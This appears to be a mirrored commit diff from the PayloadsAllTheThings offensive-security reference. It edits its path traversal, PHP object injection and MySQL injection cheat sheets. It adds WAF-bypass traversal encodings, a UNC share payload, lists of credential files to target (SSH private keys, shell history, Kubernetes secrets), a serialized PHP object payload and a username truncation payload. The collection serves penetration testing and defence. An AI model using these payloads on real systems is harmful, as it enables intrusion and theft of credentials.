mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Fix typo in PHP Object injection
This commit is contained in:
parent
13ba72f124
commit
f6564869f0
@ -6,7 +6,14 @@
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Basic exploitation](#basic-exploitation)
|
||||
* [16 bits Unicode encoding](#)
|
||||
* [UTF-8 Unicode encoding](#)
|
||||
* [Bypass "../" replaced by ""](#)
|
||||
* [Double URL encoding](#)
|
||||
* [UNC Bypass](#unc-bypass)
|
||||
* [Path Traversal](#path-traversal)
|
||||
* [Interesting Linux files](#)
|
||||
* [Interesting Windows files](#)
|
||||
|
||||
## Tools
|
||||
|
||||
@ -31,7 +38,7 @@ We can use the `..` characters to access the parent directory, the following str
|
||||
%uff0e%uff0e%u2216
|
||||
```
|
||||
|
||||
16 bit Unicode encoding
|
||||
### 16 bits Unicode encoding
|
||||
|
||||
```powershell
|
||||
. = %u002e
|
||||
@ -39,7 +46,7 @@ We can use the `..` characters to access the parent directory, the following str
|
||||
\ = %u2216
|
||||
```
|
||||
|
||||
UTF-8 Unicode encoding
|
||||
### UTF-8 Unicode encoding
|
||||
|
||||
```powershell
|
||||
. = %c0%2e, %e0%40%ae, %c0ae
|
||||
@ -47,6 +54,7 @@ UTF-8 Unicode encoding
|
||||
\ = %c0%5c, %c0%80%5c
|
||||
```
|
||||
|
||||
### Bypass "../" replaced by ""
|
||||
Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
|
||||
|
||||
```powershell
|
||||
@ -54,7 +62,7 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
|
||||
...\.\
|
||||
```
|
||||
|
||||
Double URL encoding
|
||||
### Double URL encoding
|
||||
|
||||
```powershell
|
||||
. = %252e
|
||||
@ -62,10 +70,18 @@ Double URL encoding
|
||||
\ = %255c
|
||||
```
|
||||
|
||||
### UNC Bypass
|
||||
|
||||
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
|
||||
|
||||
```powershell
|
||||
\\localhost\c$\windows\win.ini
|
||||
```
|
||||
|
||||
|
||||
## Path Traversal
|
||||
|
||||
Linux - Interesting files to check out :
|
||||
### Interesting Linux files
|
||||
|
||||
```powershell
|
||||
/etc/issue
|
||||
@ -85,9 +101,16 @@ Linux - Interesting files to check out :
|
||||
/proc/net/route
|
||||
/proc/net/tcp
|
||||
/proc/net/udp
|
||||
/proc/self/cwd/index.php
|
||||
/proc/self/cwd/main.py
|
||||
/home/$USER/.bash_history
|
||||
/home/$USER/.ssh/id_rsa
|
||||
/var/run/secrets/kubernetes.io/serviceaccount
|
||||
```
|
||||
|
||||
Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
|
||||
### Interesting Windows files
|
||||
|
||||
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
|
||||
|
||||
```powershell
|
||||
c:/boot.ini
|
||||
@ -127,15 +150,7 @@ The following log files are controllable and can be included with an evil payloa
|
||||
/var/log/mail
|
||||
```
|
||||
|
||||
Other easy win files.
|
||||
|
||||
```powershell
|
||||
/proc/self/cwd/index.php
|
||||
/home/$USER/.bash_history
|
||||
/var/run/secrets/kubernetes.io/serviceaccount
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
||||
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
|
@ -99,7 +99,7 @@ if($obj) {
|
||||
Payload:
|
||||
|
||||
```php
|
||||
O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
|
||||
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
|
||||
```
|
||||
|
||||
## Others exploits
|
||||
|
@ -263,6 +263,12 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
|
||||
|
||||
In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
|
||||
|
||||
```sql
|
||||
`username` varchar(20) not null
|
||||
```
|
||||
|
||||
Payload: `username = "admin a"`
|
||||
|
||||
## MYSQL UDF command execution
|
||||
|
||||
First you need to check if the UDF are installed on the server.
|
||||
|
Loading…
Reference in New Issue
Block a user